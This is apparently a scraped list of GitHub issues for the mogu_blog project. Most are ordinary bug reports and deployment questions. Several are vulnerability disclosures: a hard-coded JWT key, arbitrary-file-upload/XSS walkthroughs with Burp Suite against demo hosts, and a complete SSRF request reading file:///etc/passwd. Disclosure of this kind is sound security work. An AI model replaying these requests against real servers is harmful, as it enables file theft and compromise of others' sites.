Get 500 when visit with https

操作系统：CentOS 7.6 64bit
Nacos 报错信息：
Caused by: com.alibaba.nacos.api.exception.NacosException: Nacos Server did not start because dumpservice bean construction failure : No DataSource set at com.alibaba.nacos.config.server.service.dump.DumpService.dumpOperate(DumpService.java:203) at com.alibaba.nacos.config.server.service.dump.ExternalDumpService.init(ExternalDumpService.java:50) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleElement.invoke(InitDestroyAnnotationBeanPostProcessor.java:363) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleMetadata.invokeInitMethods(InitDestroyAnnotationBeanPostProcessor.java:307) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor.postProcessBeforeInitialization(InitDestroyAnnotationBeanPostProcessor.java:136) ... 40 common frames omitted Caused by: java.lang.IllegalStateException: No DataSource set at org.springframework.util.Assert.state(Assert.java:73) at org.springframework.jdbc.support.JdbcAccessor.obtainDataSource(JdbcAccessor.java:77) at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:371) at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:452) at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:462) at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:473) at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:480) at com.alibaba.nacos.config.server.service.repository.extrnal.ExternalStoragePersistServiceImpl.findConfigMaxId(ExternalStoragePersistServiceImpl.java:553)

Hi, we are a research group to help developers build secure applications. We designed a cryptographic misuse detector on Java language(Our main concern is the secure implementation and use of Json Web Token). We found your great public repository (i.e.,mogu_blog_v2) from Github, and several security issues detected by our detector are shown in the following. The specific security issues we found are as follows:
(1) Location: Package: package com.moxi.mogublog.utils; Class: JwtUtil.class
Security issue: Using predictable/constant seed to generate cryptographic key when creating and verifing Json Web Token.

Using a hard-coded seed to generate key [(new SecretKeySpec(encodedKey, 0, encodedKey.length, "AES");] does not conform to the security implementation specification of JWT, which may bring security risks to your system. It is recommended that you use a more secure way to generate the key used to generate the JWT. （For the hazards of hardcoded keys, you can refer to CWE-321, NIST Special Publication 800-57).

We wish the above security issues cloud truly help you to build a secure application. If you have any concern or suggestion, please feel free to contact us, we are looking forwart to your reply. Thanks.

有没有使用k8s方式部署的相关文章

Using mogu2021:mogu2021 to log in the Mogu blog.
http://demoweb.moguit.cn/


Choose User Center > User Avatar > Image


At this point, use the burp suite to capture the request packet.
Use the Repeater module in BurpSuite.
Try to change the file contents in the request package to the XSS payload and try to change the file name to the HTML suffix.
You can see the successful upload and the file path in the response package.

Open your browser to access the HTML file you just uploaded

希望学习一下思路，谢谢大佬

vue-mogu-admin进行npm run build时报错，显示信息为某css文件出错，但是也未找到相应css文件

复现步骤: 后端mogu_blog_go + 前端 mogu_blog_v2下的vue_mogu_web
我发现 有目录空白的修复记录, 但是我跑mogo_go版本目录还是空白的

我本身是java开发，目前公司的项目也是spring cloud全家桶
看到这个project 有点手痒
还没看过数据库结构
不知道能不能迁移过来

1、复现详情（Reproduction details）

构造BurpSuite请求报文，利用file协议读取文件/etc/passwd中的内容，写入到图片中：
Construct a BurpSuite request message, use the file protocol to read the contents of the /etc/passwd file, and write it into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
	"token":"asdf",
        "adminUid":"asdf",
        "sortName":"admin",
        "projectName":"blog",
        "urlList":[
                "file:///etc/passwd"]
}

Visit image address: http://your-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg

2、底层分析（Bottom-up analysis）

入口点：
Entrance point：
FileRestApi#uploadPicsByUrl

进入uploadPictureByUrl()方法：
传入的fileV0为springboot前端传入的参数自动装配，从fileV0中取出urlList
Enter the uploadPictureByUrl() method：
The incoming fileV0 is the parameter automatically wired by the Spring Boot frontend. Extract urlList from fileV0

遍历urlList并传入uploadPictureByUrl()方法中，中间未作任何过滤：
Traverse urlList and pass it into the uploadPictureByUrl() method without any filtering in between:

更进uploadPictureByUrl方法：
uploadPictureByUrl方法中也未作任何过滤，直接传入URL类中
Further improve the uploadPictureByUrl method:
no filtering is done in the uploadPictureByUrl method, and the URL is directly passed in

调用openConnection方法后，获取数据流写入输出流中：
After calling the openConnection method, get the data stream and write it to the output stream：

文件写入的路径（文件输出流）：
The path for writing the file (output stream):

3、修复方案（Repair plan）

（1）建议使用HttpURLConnection类，替代Url类，并对请求的ip地址进行判断，过滤掉内网ip
（1）Suggest using the HttpURLConnection class instead of the Url class, and filtering out intranet IP addresses by checking the requested IP address

问题复现

比如说我想要红框内的字母用公式表示，然后我把它复制到$ $中

则对于一些非字母符号会自动出现转义符号\

提交上传之后也无法正常显示：

蘑菇博客的markdown编辑器是由Vditor支持的，于是我查看了并尝试了Vditor` 的在线 demo ，发现也存在同样的问题：

问题如何解决

我个人认为大概率是 Vditor 的问题，可能是 Vditor 对转义符号的特殊操作导致的。下一步我将尝试寻找一些 markdown 编辑器试试能不能解决这个问题。

你好，在nacos分支上用docker compose部署好博客环境后，使用ES搜索功能时前端无法正常显示搜索结果：

通过docker ps和nacos界面判断mogu_search container已经正常启动

在后台 --> 系统配置中配置为ES并且保存：

有人使用outlook邮箱做注册验证邮件发送邮箱的吗？怎么设置的啊？授权码是用outlook的应用密码的？

1.Black box pentesting

Using mogu2021:mogu2021 to log in the mogu_blog_v5.2 backend Management System.

Find the Blog Management - Blog Management - Local-file Upload feature .

Click this blue button to select a local image for uploading, and then click the green button to put the image to server side

At this point, use the burp suite to capture the request packet.

and then forward it to the Repeater module.

Try to send a request to upload a normal image and you can see that the image was uploaded successfully.

And the response packet returns the address information of the image.

Splice the address in the response packet with the url to try to access the image we just uploaded .

The whole url :
http://23.224.61.136:8600//blog/admin/png/2022/3/8/1646708813850.png

You can see the successful access to the uploaded image.

Back in the burp suite, try changing the contents of the file in the request package to xss payload，as well as trying to change the file name to an html suffix.

You can see the successful upload and the file path in the response package.

Splice the file path to the url and open a new browser (without admin cookies/session/token) to try to access it.

The whole url :
http://23.224.61.136:8600///blog/admin/html/2022/3/8/1646709195222.html

You can see that the xss payload was successfully executed and that there is an arbitrary file to upload.

Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded.

jsp:

php:

cpp:

2.White box pentest

Based on the url of the image upload request
(/mogu-picture/file/pictures), we can tell that the class that handles the image upload function is located in the /mogu-picture subproject

According to the request url (mogu-picture/file/pictures) continue to locate the FileRestApi.java class

mogu_blog/mogu_blog_v2/mogu_picture/src/main/java/com/moxi/mogublog/picture/restapi/FileRestApi.java

With @RequestMapping("/file") you can see that all requests for the /file path will be processed by this class

And requests for the /file/pictures path are handled by the uploadPics() method of this class

This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file

This method then calls the batchUploadFile() method of the FileServiceImpl class instance object

Follow up in the batchUploadFile() method of the FileServiceImpl class to see its source code

The first part of the code is to get some files and system base information, none of which is file-checked

Continuing to follow up to the code for file uploads,

You can see that there is no strict verification of the uploaded file extension, file content, or file format

The next code execution reaches the try /catch {} block, which involves the uploadFile() method of the QiniuServiceImpl class

Going deeper into this method leads to the uploadSingleFile() method.

You can see that the file suffix, file format and file content are still not strictly verified.

Back in the batchUploadFile() method of the FileServiceImpl class,

After checking the code after , not only the code for uploading the QiNiu server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified.

Finally, in the batchUploadFile() method of the FileServiceImpl class, the following code will be executed.

Set the information of the uploaded file to some settings.

Then save and upload feedback to the client response file.

The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files.

This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.

package com.moxi.mogublog.admin.restapi;

这个包中更新管理员邮箱或手机号 updateEmail()方法

//这里你传的参数是 管理员新邮箱或新手机号,应该是验证码.你下面也比较的是验证码
String checkValidCode = stringRedisTemplate.opsForValue().get(newInfo);
if (checkValidCode.isEmpty()) {
return ResultUtil.result(SysConf.ERROR, "验证码已过期");
}
if (!checkValidCode.equals(validCode)) {
return ResultUtil.result(SysConf.ERROR, "验证码不正确");
}

build 报错 改node 版本也不行。

如此复杂的技术栈用在小众的个人博客这个业务上, 看到这个业务,再看技术栈, 劝退很多人.